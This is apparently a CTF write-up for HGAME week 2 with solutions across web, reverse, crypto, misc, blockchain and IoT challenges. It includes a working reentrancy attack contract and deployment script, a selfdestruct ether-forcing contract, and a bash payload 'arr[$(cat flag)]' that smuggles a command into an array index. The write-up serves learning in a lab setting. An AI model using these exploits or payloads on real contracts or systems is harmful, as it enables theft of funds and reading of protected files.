hgame2023-week2

hgame2022-week2

web

Git Leakage

githack 直接就看见了

v2board

[V2Board Admin.php 越权访问漏洞 | PeiQi文库](http://wiki.peiqi.tech/wiki/webapp/V2Board/V2Board%20Admin.php%20越权访问漏洞.html)

Reverse

before_main

换表base64

你直接看的表不一定是真的

在这里插入图片描述

math

有意思的点在 &savedregs-0x170 == v8

在这里插入图片描述

import numpy as np

# Right-hand side of the matrix equation recovered from the binary, as a 5x5 grid.
v12 = np.array([63998,33111,67762,54789,61979,69619,37190,70162,53110,68678,63339,30687,66494,50936,60810,48784,30188,60104,44599,52265,43048,23660,43850,33646,44270]).reshape(5, 5)

# Coefficient matrix, also 5x5.
v10 = np.array([126,225,62,40,216,253,20,124,232,122,62,23,100,161,36,118,21,184,26,142,59,31,186,82,79]).reshape(5, 5)

# Solve flag @ v10 == v12 by right-multiplying with the inverse of v10.
v10_inv = np.linalg.inv(v10)

# The inverse is computed in floating point, so snap each entry to the nearest
# integer before treating it as a character code.
flag = np.around(v12 @ v10_inv)

# Read the 5x5 result row by row and turn every entry into one character.
flag_str = ''.join(chr(int(code)) for code in flag.flat)

print(flag_str)

stream

logo一眼真python

在这里插入图片描述

虚拟机解包 stream.pyc

pycdc 反编译了个寂寞,给我的是字节码

(pycdc 是用 cmake 编译的,当时只编译出了 pycdas(反汇编器),所以拿到的是字节码;把 pycdc.exe 编译出来就 ok 了)

import base64

def gen(key):
    """Return the first 50 keystream bytes of RC4 keyed with the string *key*.

    The two loops are the textbook RC4 key-scheduling and output stages over a
    256-entry permutation. The result is a list of 50 ints in 0..255, so a
    caller that zips it against a message only covers the first 50 characters.
    RC4 is a broken cipher; it appears here only because the challenge uses it.
    """
    state = list(range(256))

    # Key scheduling: shuffle the permutation under control of the key characters.
    swap_at = 0
    for idx in range(256):
        swap_at = (swap_at + state[idx] + ord(key[idx % len(key)])) % 256
        state[idx], state[swap_at] = state[swap_at], state[idx]

    # Output stage: keep shuffling and emit one byte per step.
    stream = []
    a = b = 0
    for _ in range(50):
        a = (a + 1) % 256
        b = (b + state[a]) % 256
        state[a], state[b] = state[b], state[a]
        stream.append(state[(state[a] + state[b]) % 256])
    return stream


def encrypt(text, key):
    """XOR *text* with the keystream from ``gen(key)`` and return it as base64 text.

    Each character is XORed with one keystream byte and turned back into a
    character with ``chr``. The resulting *string* is then UTF-8 encoded before
    base64, so any XOR result of 128 or above occupies two bytes in the output.
    To reverse it: base64-decode, UTF-8 decode, then XOR the characters with the
    same keystream. Only as many characters as ``gen`` yields (50) are processed,
    because ``zip`` stops at the shorter input.
    """
    mixed = ''.join(chr(ord(ch) ^ ks) for ch, ks in zip(text, gen(key)))
    return base64.b64encode(mixed.encode()).decode()

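# Driver recovered from stream.pyc: read a candidate flag, encrypt it with the
# fixed key and compare against the expected base64 string.
# The decompiler printed the failure branch as a module-level `return None`
# followed by `None('try again...')`, which is not valid Python; it is restored
# here as the else-branch print it presumably was.
text = input('Flag: ')
key = 'As_we_do_as_you_know'
enc = encrypt(text, key)
if enc == 'wr3ClVcSw7nCmMOcHcKgacOtMkvDjxZ6asKWw4nChMK8IsK7KMOOasOrdgbDlx3DqcKqwr0hw701Ly57w63CtcOl':
    print('yes!')
else:
    print('try again...')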

在这里插入图片描述

ChatGPT:无所谓,我会出手。

在这里插入图片描述

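不知道为啥只有随波逐流好使 有没有密码神解释一下。。。(原因应该是:encrypt 里先把异或结果用 chr 拼成字符串,再 .encode() 成 UTF-8 之后才做 base64,所以解密时要先 base64 解码、再按 UTF-8 解码成字符,最后才和 RC4 密钥流异或;直接把 base64 解码出的字节当 RC4 密文的工具就解不出来。)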

VidarCamera

jadx正常逆向 无壳

看代码逻辑 先转int再xtea加密再比对

// Packs the 40-character input into ten 32-bit words (four characters per word)
// and stores word i / 4 into r3. The excerpt stops before the loop's closing brace.
// NOTE(review): as printed, Java's `+` binds tighter than `<<`, so this expression
// does not literally compute c0 | c1 << 8 | c2 << 16 | c3 << 24; the decompiler
// appears to have dropped the parentheses. The intended layout is presumably
// little-endian (first character in the low byte); confirm against the smali.
for (int i = 0; i < 40; i += 4) {
    UIntArray.m178setVXSXFK8(r3, i / 4, obj.charAt(i)
            + obj.charAt(i + 1) << 8
                    + obj.charAt(i + 2) << 16
                            + obj.charAt(i + 3) << 24);

char转int 直接看就行

下面是加密函数 xtea

/**
 * Encrypts the word array in place with a modified XTEA and returns the same array.
 *
 * This is raw jadx output: every UInt / UIntArray call is a wrapper around a plain
 * 32-bit read, write or wrap-around operation (presumably Kotlin unsigned types).
 * Differences from reference XTEA that are visible here: the per-round constant is
 * 878077251 (0x34566543), the first half-round has an extra "^ i4", each block runs
 * 33 rounds, and consecutive blocks overlap by one word.
 *
 * @param iArr input words; indices 0..9 are read and written
 * @return iArr, modified in place
 */
private final int[] m0encrypthkIa6DI(int[] iArr) {
    int i;
    // Four-word key, hard-coded.
    int[] r1 = UIntArray.m167constructorimpl(4);
    UIntArray.m178setVXSXFK8(r1, 0, 2233);
    UIntArray.m178setVXSXFK8(r1, 1, 4455);
    UIntArray.m178setVXSXFK8(r1, 2, 6677);
    UIntArray.m178setVXSXFK8(r1, 3, 8899);
    // i2 is the index of the left word of the current block; it takes the values 0..8.
    int i2 = 0;
    while (i2 < 9) {
        // i3 counts rounds, i4 is the running sum; both restart for every block.
        int i3 = 0;
        int i4 = 0;
        do {
            i3++;
            // Right word of the block is always the next array element.
            i = i2 + 1;
            // Half-round 1: left += ((key[sum & 3] + sum) ^ (((right << 4) ^ (right >>> 5)) + right)) ^ sum
            UIntArray.m178setVXSXFK8(iArr, i2, UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i2) + UInt.m114constructorimpl(UInt.m114constructorimpl(UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(r1, UInt.m114constructorimpl(i4 & 3)) + i4) ^ UInt.m114constructorimpl(UInt.m114constructorimpl(UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i) << 4) ^ UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i) >>> 5)) + UIntArray.m173getpVg5ArA(iArr, i))) ^ i4)));
            // Half-round 2: right += (((left << 4) ^ (left >>> 5)) + left) ^ (key[(sum >>> 11) & 3] + sum)
            UIntArray.m178setVXSXFK8(iArr, i, UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i) + UInt.m114constructorimpl(UInt.m114constructorimpl(UInt.m114constructorimpl(UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i2) << 4) ^ UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(iArr, i2) >>> 5)) + UIntArray.m173getpVg5ArA(iArr, i2)) ^ UInt.m114constructorimpl(UIntArray.m173getpVg5ArA(r1, UInt.m114constructorimpl(UInt.m114constructorimpl(i4 >>> 11) & 3)) + i4))));
            // Advance the running sum by the round constant.
            i4 = UInt.m114constructorimpl(i4 + 878077251);
        } while (i3 <= 32); // i3 is incremented first, so the body runs 33 times
        // Step forward by one word only, so the next block reuses this block's right word.
        i2 = i;
    }
    return iArr;
}

手工代码优化(出题人来挨打

    /**
     * Hand-simplified form of the decompiled routine: a modified XTEA that encrypts
     * the word array in place and returns it.
     *
     * The UInt wrappers are replaced by plain int arithmetic; Java int addition wraps
     * modulo 2^32 and the right shifts are the unsigned ">>>", so the bit patterns are
     * the same as with unsigned words.
     *
     * @param iArr input words; indices 0..9 are read and written
     * @return iArr, modified in place
     */
    private final int[] m0encrypthkIa6DI(int[] iArr) {
        int i;
        // Four-word key, hard-coded.
        int[] r1 = new int[4];
        r1[0] = 2233;
        r1[1] = 4455;
        r1[2] = 6677;
        r1[3] = 8899;
        // i2 indexes the left word of the current block and runs 0..8.
        int i2 = 0;
        while (i2 < 9) {
            // Round counter and running sum restart for every block.
            int i3 = 0;
            int i4 = 0;
            do {
                i3++;
                i = i2 + 1;
                // Half-round 1; the trailing "^ i4" is not part of reference XTEA.
                iArr[i2]=iArr[i2] + (((r1[i4 & 3]+ i4)^ (((iArr[i] << 4)^ (iArr[i] >>> 5))+ iArr[i]))^ i4);
                // Half-round 2 uses the already-updated left word.
                iArr[i]= iArr[i]  + ((((iArr[i2] << 4)^(iArr[i2] >>> 5))+iArr[i2])^(r1[(i4 >>> 11)& 3]+ i4));
                // Round constant 878077251 (0x34566543) instead of XTEA's usual delta.
                i4 = i4 + 878077251;
            } while (i3 <= 32); // 33 iterations, because i3 is incremented before the test
            // Advance by one word: blocks (0,1), (1,2), ... (8,9) overlap.
            i2 = i;
        }
        return iArr;
    }

注意三点

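  1. i = i2 + 1,且每轮结束 i2 = i:每次只前移一个 int,相邻两组 (i2, i2+1) 互相重叠,所以解密要从最后一组倒着解
  2. iArr[i2]=iArr[i2] + (((r1[i4 & 3]+ i4)^ (((iArr[i] << 4)^ (iArr[i] >>> 5))+ iArr[i]))^ i4);这里比原版 xtea 多异或了一次 i4(即 sum)
  3. 循环 33 次(do…while 的条件是 i3 <= 32)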
#include <stdio.h>
#include <stdint.h>

/* Ten 32-bit words that the solver decrypts in place; presumably the comparison
 * table lifted from the app. */
int flag[10] = {
    637666042, 457511012, -2038734351, 578827205, -245529892,
    -1652281167, 435335655, 733644188, 705177885, -596608744
};

/* Four-word cipher key, the same constants the Java routine stores in r1. */
unsigned int key[4] = { 2233, 4455, 6677, 8899 };

/*
 * Encrypt one two-word block in place with the challenge's XTEA variant.
 *
 * num_rounds: number of rounds to run (the app uses 33).
 * v:          the two 32-bit words of the block; overwritten with the result.
 *
 * Compared with reference XTEA the round constant is 878077251 and the first
 * half-round carries an extra "^ sum". The key comes from the global `key`.
 */
void encipher(unsigned int num_rounds, uint32_t v[2]) {
    const uint32_t delta = 878077251;
    uint32_t left = v[0];
    uint32_t right = v[1];
    uint32_t sum = 0;

    while (num_rounds-- > 0) {
        uint32_t mix = ((right << 4) ^ (right >> 5)) + right;
        left += (mix ^ (sum + key[sum & 3])) ^ sum;

        mix = ((left << 4) ^ (left >> 5)) + left;
        right += mix ^ (sum + key[(sum >> 11) & 3]);

        sum += delta;
    }

    v[0] = left;
    v[1] = right;
}

/*
 * Decrypt one two-word block in place; exact inverse of encipher().
 *
 * num_rounds: number of rounds that were used to encrypt (33 for this app).
 * v:          the two 32-bit words of the block; overwritten with the plaintext.
 *
 * The running sum starts at delta * num_rounds (wrapping in 32 bits) and is
 * stepped back before each round, and the two half-rounds are undone in the
 * opposite order. The key comes from the global `key`.
 */
void decipher(unsigned int num_rounds, uint32_t v[2]) {
    const uint32_t delta = 878077251;
    uint32_t left = v[0];
    uint32_t right = v[1];
    uint32_t sum = delta * num_rounds;
    unsigned int remaining;

    for (remaining = num_rounds; remaining != 0; remaining--) {
        uint32_t mix;

        sum -= delta;

        mix = ((left << 4) ^ (left >> 5)) + left;
        right -= mix ^ (sum + key[(sum >> 11) & 3]);

        mix = ((right << 4) ^ (right >> 5)) + right;
        left -= (mix ^ (sum + key[sum & 3])) ^ sum;
    }

    v[0] = left;
    v[1] = right;
}

/*
 * Undo the overlapping block encryption and print the 40 recovered bytes.
 *
 * The app encrypts pairs (0,1), (1,2), ... (8,9) in that order, so the pairs are
 * decrypted from the last one back to the first. The words are then read back
 * byte by byte, which yields the characters in order only on a little-endian host.
 */
int main()
{
    int idx = 9;
    while (idx-- > 0)
    {
        decipher(33, (uint32_t *)&flag[idx]);
    }

    const char *bytes = (const char *)flag;
    for (int pos = 0; pos < 40; pos++)
    {
        putchar(bytes[pos]);
    }
}

Crypto

Rabin

在这里插入图片描述

包里有什么

import gmpy2
from libnum import n2s

# Challenge values: modulus m, the published first weight b0 and the ciphertext c.
m = 1528637222531038332958694965114330415773896571891017629493424
b0 = 69356606533325456520968776034730214585110536932989313137926
c = 93602062133487361151420753057739397161734651609786598765462162

# The private weights are 2, 4, 8, ... so the first public weight is 2 * w mod m;
# halving b0 gives the multiplier w.
w = b0 // 2

# Number of weights. Fixed at 198; m.bit_length() - 2 was the earlier guess.
l = 198
a = [2 << shift for shift in range(l)]

# Strip the multiplier, then peel off the weights from largest to smallest.
c1 = c * gmpy2.invert(w, m) % m
bits = []
for weight in reversed(a):
    if c1 >= weight:
        bits.append("1")
        c1 -= weight
    else:
        bits.append("0")
key = "".join(bits)

# The bits were collected largest weight first; reverse them before decoding.
print(n2s(int(key[::-1], 2)))

RSA 大冒险1

很有意思 模拟了真实情况

1:除p撇yafu分解

2:加密两次 模不互素

3:小e攻击

4:加密两次 共模攻击

Misc

Tetris Master

非预期了属于是

ctrl+c

Sign In Pro Max

part1 base64 base58 base32

part2-4 somd5解密

part5 凯撒

在这里插入图片描述

crazy_qrcode

修复二维码

在这里插入图片描述

拿到密码

[1, 2, ?, 3, ?, 0, 3, ?, ?, 3, ?, 0, 3, 1, 2, 1, 1, 0, 3, 3, ?, ?, 2, 3, 2]

按照顺序拼,再根据给的数 ×90° 旋转,慢慢拼

在这里插入图片描述

Tetris Master Revenge

bytectf2022 bash_game原题

在这里插入图片描述

在这里插入图片描述

EDI wp

arr[$(cat flag)]

BlockChain

VidarBank

经典重入攻击

构造恶意合约

// SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.8.7;

import "./VidarBank.sol";

/// @title Reentrancy proof-of-concept for the VidarBank challenge.
/// @notice VidarBank.sol is imported but not shown on this page, so what its
///         functions do is inferred from their names; confirm against the source.
/// @dev Defensive takeaway: a contract that calls out to its caller before it has
///      updated its own bookkeeping can be re-entered through the caller's
///      fallback. Update state first (checks-effects-interactions) or add a
///      reentrancy guard on the function that makes the external call.
contract Attack{
    // Handle to the target contract, fixed at deployment.
    VidarBank public vidarBank;
    constructor(address _vidarBank) {
        vidarBank = VidarBank(_vidarBank);
    }

    // Requires at least 0.0001 ether and forwards exactly 0.0001 ether to
    // vidarBank.newAccount(); anything sent above that stays in this contract.
    function getNewAccount() public payable{
        require(msg.value >= 0.0001 ether);
        vidarBank.newAccount{value: 0.0001 ether}();
    }

    // Entry point: a single call to vidarBank.donateOnce().
    function pwnDonateOnce() public {
        vidarBank.donateOnce();
    }

    // Runs when this contract is called with data that matches no function, or
    // when it receives ether. It calls isSolved() once getBalance() reaches 30
    // and then calls donateOnce() again on every entry.
    // NOTE(review): no stop condition is visible here; the recursion presumably
    // ends when the target stops calling back or the call runs out of gas.
    fallback () payable external {
        if (vidarBank.getBalance() >= 30) {
            vidarBank.isSolved();
        }
        vidarBank.donateOnce();
    }
}

部署 调用就完了

import json
from eth_account import Account
from web3 import Web3
import time

# Private key of the account that signs every transaction below. It is empty on
# purpose: fill in a throwaway challenge key locally and keep real keys out of
# the script.
private_key = ""

web3 = Web3(Web3.HTTPProvider('http://week-2.hgame.lwsec.cn:30191/'))

# Print whether the RPC endpoint answered; the script carries on either way.
print(web3.isConnected())

account = Account.privateKeyToAccount(private_key)


def _sign_and_wait(tx_fields):
    """Sign *tx_fields* with the account key, broadcast it and return the receipt."""
    signed_tx = account.signTransaction(tx_fields)
    sent_hash = web3.eth.sendRawTransaction(signed_tx.rawTransaction)
    return web3.eth.waitForTransactionReceipt(sent_hash)


# Compiler output for the helper contract: ABI as JSON, creation bytecode as hex text.
with open('attack_sol_Attack.abi', 'r') as abi_file:
    abi = json.load(abi_file)

with open('attack_sol_Attack.bin', 'r') as bin_file:
    bytecode = bin_file.read()

factory = web3.eth.contract(abi=abi, bytecode=bytecode)

# Address of the challenge contract, normalised to checksum form.
contractAttackedAddress = web3.toChecksumAddress("0x01E4c8e701eE9d52Cb6c15DdA211Dd24a74661a5")

# Deploy the helper contract, passing the challenge address to its constructor.
deploy_tx = factory.constructor(contractAttackedAddress).build_transaction({
    'from': account.address,
    'nonce': web3.eth.getTransactionCount(account.address),
    'gas': 1728712,
    'gasPrice': web3.toWei('22', 'gwei')
})
tx_receipt = _sign_and_wait(deploy_tx)
print(tx_receipt)

# Address the helper contract was deployed to, taken from the receipt.
contractAddress = web3.toChecksumAddress(tx_receipt.contractAddress)

# Bind the ABI to the deployed instance.
deployed = web3.eth.contract(address=contractAddress, abi=abi)

# First call: getNewAccount, funded with 0.00011 ether.
# NOTE(review): none of the receipts is checked for status, so a reverted
# transaction is printed like a successful one.
tx_receipt = _sign_and_wait(deployed.functions.getNewAccount().buildTransaction({
    'gas': 1000000,
    'gasPrice': web3.toWei('100', 'gwei'),
    'from': account.address,
    'nonce': web3.eth.getTransactionCount(account.address),
    'value': web3.toWei('0.00011', 'ether')
}))
print("调用合约的方法: getNewAccount", tx_receipt)

# Second call: pwnDonateOnce.
tx_receipt = _sign_and_wait(deployed.functions.pwnDonateOnce().buildTransaction({
    'gas': 1000000,
    'gasPrice': web3.toWei('100', 'gwei'),
    'from': account.address,
    'nonce': web3.eth.getTransactionCount(account.address)
}))
print("调用合约的方法: pwnDonateOnce", tx_receipt)

把最后的hash给nc

Transfer

因为对remix不熟悉 耽误一血了 呜呜呜 二血也不错!

selfdestruct()

在这里插入图片描述

// SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.8.7;

/// @title Helper that holds ether and hands all of it to a chosen address on destruction.
/// @dev Defensive takeaway: ether sent by selfdestruct arrives without running the
///      recipient's receive/fallback code, so a contract must not assume that
///      address(this).balance only changes through its own payable functions.
///      The challenge contract is not shown on this page; which check it relies
///      on is presumably a balance comparison, confirm against its source.
///      selfdestruct is deprecated (EIP-6049) and no longer removes the contract
///      in most cases since EIP-6780, though it still transfers the balance.
contract Attack{
    // Running total of ether received through deposit().
    uint public balance = 0;

    // Sends this contract's entire ether balance to _to. There is no access
    // check, so any caller can trigger it.
    function destruct(address payable _to) external payable {
        selfdestruct(_to);
    }
    
    // Accepts ether and adds the amount to the counter.
    function deposit() external payable {
        balance += msg.value;
    }

}

remix 部署,给合约打钱,再销毁就行了

(期待出题人说的第二种方法。。。)

IoT

Pirated router

解包 在bin发现 secret_program arm64的

router是mips32 显然不对劲

没arm设备 不想用qemu 直接逆向吧 就一个异或

Pirated keyboard

流量抠出

zihiui_NB_666}

在这里插入图片描述

与源代码比较发现

I与H互换

zhihuh_NB_666}

在这里插入图片描述

pdf多东西

在这里插入图片描述

打开直接发现

hgame{peng_zhihuh_NB_666}
